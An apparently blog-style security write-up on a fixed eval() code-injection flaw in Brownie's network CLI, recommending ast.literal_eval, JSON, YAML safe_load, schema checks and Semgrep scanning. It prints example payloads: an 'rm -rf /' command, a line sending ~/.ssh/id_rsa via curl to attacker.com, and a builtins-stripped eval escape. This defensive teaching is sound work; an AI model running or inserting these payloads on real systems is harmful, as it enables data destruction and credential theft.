Code Injection via eval(): How a Critical Python Flaw Was Fixed in Brownie
Introduction
Python's eval() function is one of those features that looks incredibly convenient on the surface — and dangerously sharp underneath. It can evaluate any Python expression passed to it as a string, which makes it feel like a superpower when you need dynamic behavior. But that same power becomes a catastrophic liability the moment untrusted data finds its way into its argument.
A recent security patch in Brownie, a popular Python-based development and testing framework for Ethereum smart contracts, addressed exactly this problem. A call to eval() in the CLI's network configuration module (brownie/_cli/networks.py) was identified by static analysis tooling (Semgrep) as a high-severity code injection risk — and for good reason.
If you write Python, especially tooling that parses configuration files, command-line arguments, or network data, this vulnerability pattern is something you need to understand.
The Vulnerability Explained
What Is eval() and Why Is It Dangerous?
Python's built-in eval() function takes a string and executes it as a Python expression:
# Simple example
result = eval("2 + 2") # Returns 4
# Dangerous example
user_input = "__import__('os').system('rm -rf /')"
result = eval(user_input) # Executes shell command!
The problem is that eval() doesn't just evaluate math or simple data structures — it evaluates any valid Python expression, including calls to __import__, os.system, subprocess, and other powerful built-ins. If an attacker can control or influence the string passed to eval(), they can execute arbitrary code with the same privileges as the running process.
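A tempting half-measure is to "sandbox" eval() by stripping the builtins from its globals. This does not work: attribute traversal on an ordinary object can climb back to every loaded class. The payload below is a minimal, well-known demonstration of why a restricted eval() is still not a sandbox:

```python
# A common but ineffective mitigation: removing __builtins__.
# Attribute traversal on a plain tuple still reaches arbitrary classes.
payload = "().__class__.__bases__[0].__subclasses__()"
classes = eval(payload, {"__builtins__": {}})  # "sandboxed" eval

# The payload still enumerates every loaded class, which is a stepping
# stone to reaching os.system and similar primitives.
assert isinstance(classes, list) and len(classes) > 0
```

The only reliable defense is to never hand attacker-influenced strings to eval() at all.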
Where Was This in Brownie?
The vulnerable code existed in brownie/_cli/networks.py at line 87. Brownie's CLI handles network configuration — things like adding, modifying, or listing Ethereum network endpoints. This kind of configuration often involves parsing structured data from files, environment variables, or user input.
The pattern likely looked something like this (illustrative example):
# BEFORE: Vulnerable pattern
def parse_network_config(config_string):
    # Dangerous: config_string could come from an untrusted source
    config = eval(config_string)
    return config
At first glance, this might seem reasonable — perhaps the developer expected config_string to always be a Python dict literal like "{'host': 'localhost', 'port': 8545}". But eval() has no concept of "safe" input. It will execute whatever valid Python it receives.
How Could This Be Exploited?
Consider a scenario where a network configuration is loaded from a file, a remote source, or passed via a CLI argument:
# Attacker-controlled input
malicious_config = """
{'host': __import__('os').popen('curl http://attacker.com/steal?data=' + open('/home/user/.ssh/id_rsa').read()).read()}
"""
# This would execute the embedded command!
config = eval(malicious_config)
Attack vectors could include:
- Malicious configuration files: A developer clones a repository containing a tampered network config file
- Man-in-the-middle attacks: If config data is fetched over an insecure connection, an attacker could inject a payload
- Shared environments: In CI/CD pipelines or shared developer machines, a malicious actor could modify config files
- Supply chain attacks: A compromised dependency or template that generates network config strings
Real-World Impact
In the context of Brownie — a tool used by blockchain developers who routinely handle private keys, wallet credentials, and deployment configurations — the consequences of arbitrary code execution are severe:
- 🔑 Private key theft: Attackers could exfiltrate wallet private keys used for contract deployment
- 💸 Financial loss: Stolen keys mean stolen funds from crypto wallets
- 🏗️ Infrastructure compromise: Full shell access to CI/CD systems or developer machines
- 📦 Supply chain poisoning: Compromised developer machines can lead to backdoored smart contracts being deployed
The Fix
What Changed?
The fix removes the eval() call entirely, replacing it with a safer parsing approach. For Python dictionary-like configuration data, the correct tool is ast.literal_eval() — or better yet, a dedicated configuration format like JSON or YAML with proper parsing libraries.
Here's the conceptual before/after:
# BEFORE: Dangerous
def parse_network_config(config_string):
    config = eval(config_string)  # ❌ Executes arbitrary Python!
    return config

# AFTER: Safe
import ast

def parse_network_config(config_string):
    config = ast.literal_eval(config_string)  # ✅ Only parses literals
    return config
Why Is ast.literal_eval() Safer?
ast.literal_eval() is Python's built-in safe alternative for evaluating string representations of Python literals. It only supports:
- Strings and bytes
- Numbers (int, float, complex)
- Tuples, lists, dicts, sets
- Booleans and None
It explicitly rejects any expression that isn't a literal — no function calls, no imports, no attribute access. Attempting to pass malicious code raises a ValueError:
import ast
# Safe: parses a dict literal
config = ast.literal_eval("{'host': 'localhost', 'port': 8545}")
# Returns: {'host': 'localhost', 'port': 8545} ✅
# Safe failure: rejects code execution
config = ast.literal_eval("__import__('os').system('whoami')")
# Raises: ValueError: malformed node or string ✅
Even Better: Use Structured Configuration Formats
For production tooling, the gold standard is to avoid evaluating Python string expressions altogether and instead use purpose-built configuration formats:
# JSON-based config (recommended)
import json

def parse_network_config(config_string):
    config = json.loads(config_string)  # ✅ No code execution possible
    return config

# YAML-based config (use safe_load!)
import yaml

def parse_network_config(config_file_path):
    with open(config_file_path) as f:
        config = yaml.safe_load(f)  # ✅ safe_load prevents code execution
    return config

# ⚠️ Never use yaml.load() without Loader=yaml.SafeLoader
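Safe parsing is only half the job: a parser like json.loads() guarantees no code execution, but it does not guarantee the config has the shape your tool expects. A lightweight validation pass catches malformed input early. The schema below is illustrative, not Brownie's actual config layout:

```python
import json

# Hypothetical required keys and types; illustrative only,
# not Brownie's real network-config schema.
REQUIRED = {"host": str, "port": int}

def load_network_config(config_string):
    config = json.loads(config_string)  # safe: no code execution possible
    for key, expected_type in REQUIRED.items():
        if key not in config:
            raise ValueError(f"missing required key: {key!r}")
        if not isinstance(config[key], expected_type):
            raise TypeError(f"{key!r} must be {expected_type.__name__}")
    return config

config = load_network_config('{"host": "localhost", "port": 8545}')
```

Passing `'{"host": "localhost"}'` to this loader would raise a ValueError for the missing port, rather than failing later in a harder-to-diagnose way.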
Prevention & Best Practices
1. Never Use eval() on Untrusted Input
This is the cardinal rule. If there's any possibility that the string passed to eval() originates from outside your program — a file, network, environment variable, CLI argument, or user input — do not use eval().
Ask yourself: "Could an attacker influence what string gets passed here?" If the answer is "maybe," treat it as "yes."
2. Use ast.literal_eval() for Python Literal Parsing
When you genuinely need to parse Python-style data structures (e.g., converting a string representation of a dict to an actual dict), use ast.literal_eval(). It's in the standard library and is explicitly designed for this use case.
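A common legitimate use case is round-tripping: repr() turns a data structure into a literal string, and ast.literal_eval() safely reconstructs it. A minimal sketch:

```python
import ast

# Round-trip: repr() produces a literal string, and
# ast.literal_eval() safely reconstructs the original structure.
original = {"host": "localhost", "port": 8545, "tags": ("dev", "local")}
serialized = repr(original)
restored = ast.literal_eval(serialized)
assert restored == original
```

Unlike eval(), this never executes code embedded in the string: anything beyond plain literals raises a ValueError instead.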
3. Prefer Structured Data Formats
Design your configuration and data exchange around formats like:
| Format | Library | Notes |
|---|---|---|
| JSON | json (stdlib) | Fast, widely supported, no code execution |
| YAML | pyyaml | Use safe_load() only; never bare load() |
| TOML | tomllib (Python 3.11+) | Great for config files |
| INI/CFG | configparser (stdlib) | Simple key-value configs |
4. Integrate Static Analysis in Your Pipeline
This vulnerability was caught by Semgrep, a powerful open-source static analysis tool. Rules like python.lang.security.audit.eval-detected will flag eval() usage automatically.
Add security scanning to your CI/CD pipeline:
# Example GitHub Actions step
- name: Run Semgrep
  uses: returntocorp/semgrep-action@v1
  with:
    config: >-
      p/python
      p/security-audit
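Beyond the bundled rulesets, Semgrep also accepts custom rules. A minimal sketch of a rule that flags every eval() call, following Semgrep's published rule schema, might look like this:

```yaml
rules:
  - id: detect-eval
    pattern: eval(...)
    message: Avoid eval(); use ast.literal_eval() or json.loads() instead
    languages: [python]
    severity: ERROR
```

Saving this as a YAML file and running `semgrep --config path/to/rule.yml` scans the codebase against it.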
Other tools to consider:
- Bandit — Python-specific security linter (bandit -r your_project/)
- PyLint with security plugins
- SonarQube / SonarCloud
- CodeQL (GitHub Advanced Security)
5. Apply the Principle of Least Privilege
Even if code injection isn't possible, run your tools with minimal permissions. A compromised process with limited privileges can do far less damage than one running as root or with access to sensitive credentials.
6. Know the OWASP and CWE References
This vulnerability maps to well-known security standards:
- OWASP A03:2021 — Injection: The top injection risks, including code injection
- CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
- CWE-94: Improper Control of Generation of Code ('Code Injection')
Familiarizing yourself with these references helps you recognize the pattern in code reviews and security audits.
Quick Reference: Safe Alternatives to eval()
# ❌ Never do this with untrusted input
result = eval(user_data)
exec(user_data)  # exec() runs entire statements; just as dangerous
# ✅ For Python literals only
import ast
result = ast.literal_eval(user_data)
# ✅ For JSON data
import json
result = json.loads(user_data)
# ✅ For YAML config files
import yaml
result = yaml.safe_load(file_handle)
# ✅ For simple key=value configs
import configparser
config = configparser.ConfigParser()
config.read('config.ini')
Conclusion
The eval() vulnerability patched in Brownie is a textbook example of a well-intentioned shortcut becoming a serious security liability. It's easy to understand why developers reach for eval() — it's concise and flexible. But in security, flexibility without constraints is a vulnerability waiting to be discovered.
The key takeaways from this fix:
- eval() is not a parsing function; it's a code execution function. Treat it accordingly.
- ast.literal_eval() is the right tool for parsing Python literal strings safely.
- Structured formats like JSON and YAML (with safe_load) are the best long-term solution for configuration data.
- Static analysis tools like Semgrep and Bandit can catch these issues before they reach production; integrate them into your workflow today.
- In blockchain development, the stakes are especially high. Credential theft or arbitrary code execution can directly translate to financial loss.
Security isn't about being paranoid — it's about building habits. Questioning where your data comes from, using safe APIs, and automating security checks are practices that compound over time into significantly more resilient software.
If you're working on Python tooling, take 30 minutes today to run Bandit or Semgrep on your codebase. You might be surprised what you find.
This vulnerability was identified and fixed through automated security scanning. Kudos to the Brownie maintainers for the swift remediation.
References:
- Python ast.literal_eval() documentation
- Semgrep Rule: eval-detected
- OWASP Top 10: A03 Injection
- CWE-95: Eval Injection
- Bandit Python Security Linter